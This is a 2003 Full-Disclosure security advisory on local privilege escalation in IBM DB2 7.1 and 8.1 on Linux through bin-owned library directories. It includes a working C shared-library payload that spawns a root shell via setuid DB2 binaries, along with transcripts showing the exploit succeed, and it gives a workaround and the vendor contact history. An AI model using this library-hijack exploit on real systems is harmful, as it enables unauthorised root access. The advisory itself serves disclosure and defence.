Title: Local Vulnerability in IBM DB2 7.1 - 8.1 all binaries Date: 27-07-2003 Platform: Only tested in Linux but can be exported to others. Only versions 7.1 and Enterprise Server Edition v8.1 were checked but could affect other versions. Impact: Slight privilege elevation from bin to root. Author: Juan Manuel Pascual Escriba <paskat_private> Status: Vendor contacted details below. PROBLEM SUMMARY: DB2 Universal Data Base Enterprise Server Edition versions 7.1 and 8.1 are installed in /home directories and put its libraries in: /usr/IBMdb2/V7.1/lib in 7.1 Version /opt/IBM/db2/V8.1/lib in 8.1 Version In both versions the lib directory is owned by bin.bin. If some local or remote attacker could compromise bin account, it would be possible to elevate privileges to root inmediatly via a so library creation. DESCRIPTION db2 libraries are installed owned by bin in my default installation in 7.1 & 8.1 versions [pask@dimoniet home]$ ls -alc /usr/IBMdb2/V7.1 ... drwxr-xr-x 2 bin bin 4096 Jun 21 2002 java12 drwxr-xr-x 2 bin bin 4096 Jul 30 19:54 lib drwxr-xr-x 2 bin bin 4096 Jun 21 2002 map ... [pask@dimoniet home]$ ls -alc /opt/IBM/db2/V8.1/ ... drwxr-xr-x 2 bin bin 4096 Dec 11 2002 java drwxr-xr-x 2 bin bin 4096 Dec 11 2002 lib drwxr-xr-x 30 bin bin 4096 Dec 11 2002 license drwxr-xr-x 2 bin bin 4096 Dec 11 2002 map ... For bin user is too easy to create a so.lib, something like #include <stdio.h> #include <string.h> _init() { printf("en el _init()\n"); printf("Con PID=%i y EUID=%i",getpid(),getuid()); system("/bin/bash"); printf("Saliendo del Init()\n"); } compiling in /usr/IBMdb2/V7.1/lib/libdl.so.2 and exec some root-setuided binary, for example -r-s--x--x 1 root db2asgrp 15557 Jul 31 00:42 db2cacpy -r-sr-s--x 1 root db2asgrp 17562 Jun 21 2002 db2dari -r-s--x--x 1 root db2asgrp 68291 Jun 21 2002 db2genp -r-sr-x--x 1 root db2asgrp 97722 Jun 21 2002 db2licd -r-sr-s--x 1 root db2asgrp 23063 Jul 29 03:15 db2start -r-sr-s--x 1 root db2asgrp 24396 Jun 21 2002 db2stop -r-sr-s--- 1 root db2asgrp 50879 Jun 21 2002 db2sysc -r-sr-s--x 1 root db2asgrp 81925 Jun 21 2002 db2udf -r-sr-s--x 1 root db2asgrp 16940 Jun 21 2002 db2udfi [bin@dimoniet adm]$ /home/db2as/sqllib/adm/db2cacpy /home/db2as/sqllib/adm/db2cacpy: /usr/IBMdb2/V7.1/lib/libdl.so.2: no version information available (required by /usr/IBMdb2/V7.1/lib/libdb2.so.1) /home/db2as/sqllib/adm/db2cacpy: /usr/IBMdb2/V7.1/lib/libdl.so.2: no version information available (required by /usr/IBMdb2/V7.1/lib/libdb2.so.1) en el _init() Con PID=10477 y EUID=0 No value for $TERM and no -T specified No value for $TERM and no -T specified [root@dimoniet adm]# id uid=0(root) gid=0(root) groups=1(bin) [root@dimoniet adm]# exit exit Saliendo del Init() [bin@dimoniet adm]$ For 8.1 installation, the same strategy. I create a /opt/IBM/db2/V8.1/lib/libdl.so.2 and exec some of this files (exists more root-setuided files in other directories) -r-s--x--x 1 root db2grp1 70445 Dec 11 2002 db2cacpy -r-sr-s--x 1 root db2grp1 78272 Dec 11 2002 db2fmp -r-sr-s--x 1 root db2grp1 75101 Dec 11 2002 db2fmpterm -r-s--x--x 1 root db2grp1 101419 Dec 11 2002 db2genp -r-sr-x--x 1 root db2grp1 180378 Dec 11 2002 db2licd -r-sr-s--x 1 root db2grp1 38044 Dec 11 2002 db2start -r-sr-s--x 1 root db2grp1 84713 Dec 11 2002 db2stop [bin@dimoniet adm]$ ./db2start ./db2start: /opt/IBM/db2/V8.1/lib/libdl.so.2: no version information available (required by /opt/IBM/db2/V8.1/lib/libdb2e.so.1) ./db2start: /opt/IBM/db2/V8.1/lib/libdl.so.2: no version information available (required by /opt/IBM/db2/V8.1/lib/libdb2e.so.1) ./db2start: /opt/IBM/db2/V8.1/lib/libdl.so.2: no version information available (required by /opt/IBM/db2/V8.1/lib/libdb2osse.so.1) ./db2start: /opt/IBM/db2/V8.1/lib/libdl.so.2: no version information available (required by /opt/IBM/db2/V8.1/lib/libdb2osse.so.1) en el _init() Con PID=10540 Con EUID=0 No value for $TERM and no -T specified No value for $TERM and no -T specified [root@dimoniet adm]# id uid=0(root) gid=0(root) groups=1(bin) [root@dimoniet adm]# exit exit Saliendo del Init() SQL1042C An unexpected system error occurred. SQLSTATE=58004 IMPACT: bin user can gain root privileges through db2 installation EXPLOIT commented above. WORKAROUND chown to root the db2 lib directory and libraries STATUS This bug was reported to security-alertat_private on July 27. After that on July 29 IBM sec staff forwards as bcc my emails to with db2 security team. At 5th August i have'nt any idea about db2 sec team emails or how to contact with it. -------------------------------------------------- This vulnerability was researched by: Juan Manuel Pascual Escriba paskat_private http://concepcion.upv.es/~pask/advisories/2003/IBM%20DB2%20so-libraries _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Tue Aug 05 2003 - 08:09:05 PDT